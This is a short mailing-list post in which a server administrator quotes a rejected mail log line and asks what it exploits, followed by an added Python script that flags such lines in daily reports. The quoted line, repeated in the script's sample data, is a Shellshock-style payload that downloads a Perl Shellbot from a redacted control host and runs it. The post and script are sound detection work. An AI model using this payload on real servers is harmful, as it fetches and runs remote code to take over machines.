Attempted mail attack
Date: Sun, 11 Jun 2023 11:38:58 UTC
Hello.
Checking daily periodics of different servers, I'm seeing a variation of
this:
> Checking for rejected mail hosts:
> 1 553 check_mail () { :; }; cd /tmp;wget x.y.z.w5/meh;perl meh;curl -O x.y.z.w/meh;perl meh;fetch http://x.y.z.w/meh;perl meh;rm -f meh* {:;};cd/tmp;wget.x.y.z.w/meh;...
(I've redacted the C&C IP, even if it's already down).
Of course they are attempting to download a Perl Shellbot (and failing).
I'm curious, though, what vulnerability they are trying to exploit in
order to do this?
Is it some old one in sendmail? Or what?
bye & Thanks
av.
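
As an added example (not part of the original post), a small triage script for the daily "rejected mail hosts" report that flags entries like the one quoted above, where the rejected argument opens like a shell function body or chains a downloader with an interpreter. The report layout (count, SMTP reject code, ruleset name, rejected argument) is an assumption inferred from the quoted line, the sample report is constructed, and `classify` and `scan` are hypothetical names.

```python
import re

# Constructed sample, shaped like the quoted report line (assumed layout:
# count, SMTP reject code, ruleset name, rejected argument). x.y.z.w is the
# post's own redaction placeholder, not a real address.
SAMPLE_REPORT = """\
      4 550 check_rcpt <someone@example.org>
      1 553 check_mail () { :; }; cd /tmp;wget x.y.z.w/meh;perl meh;rm -f meh*
      2 553 check_mail <bounce@mail.example.net>
      1 553 check_mail <a;b@example.com>
"""

LINE = re.compile(r"^\s*(\d+)\s+(\d{3})\s+(\S+)\s+(.*)$")
# Argument opens like a shell function body: "() {"
FUNC_DEF = re.compile(r"^\(\s*\)\s*\{")
# Download tools and interpreters appearing as separate command words
FETCHER = re.compile(r"(?:^|[;&|\s])(wget|curl|fetch)\b")
RUNNER = re.compile(r"(?:^|[;&|\s])(perl|sh|bash|python\d?)\b")

def classify(arg):
    """Return the names of the indicators present in one rejected argument."""
    hits = []
    if FUNC_DEF.search(arg):
        hits.append("function-definition-prefix")
    if FETCHER.search(arg):
        hits.append("downloader")
    if RUNNER.search(arg):
        hits.append("interpreter")
    return hits

def scan(report):
    """Return (count, code, ruleset, indicators) for each suspicious line."""
    findings = []
    for raw in report.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # header lines such as "Checking for rejected mail hosts:"
        count, code, ruleset, arg = m.groups()
        hits = classify(arg)
        # Flag the function prefix, or a download-then-run pair; a lone ';'
        # inside an address is not enough.
        if hits[:1] == ["function-definition-prefix"] or {"downloader", "interpreter"} <= set(hits):
            findings.append((int(count), code, ruleset, hits))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_REPORT):
        print(finding)
```
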